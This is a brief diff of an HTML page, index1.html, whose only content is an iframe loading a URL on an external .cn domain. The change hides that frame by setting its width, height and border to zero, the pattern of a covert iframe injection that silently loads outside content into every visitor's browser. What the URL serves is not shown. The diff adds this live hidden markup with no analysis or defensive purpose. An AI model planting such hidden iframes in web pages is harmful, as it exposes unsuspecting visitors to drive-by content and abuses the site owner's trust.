--- a/index1.html
+++ b/index1.html
@@ -6,7 +6,7 @@
 <body>
    
     
-    <iframe src="http://j.metasolare.cn/KzzTj35915" width="300" height="300"></iframe>
+    <iframe src="http://j.metasolare.cn/KzzTj35915"frameborder="0" width="0" height="0"></iframe>
 
    </body>
 <html>
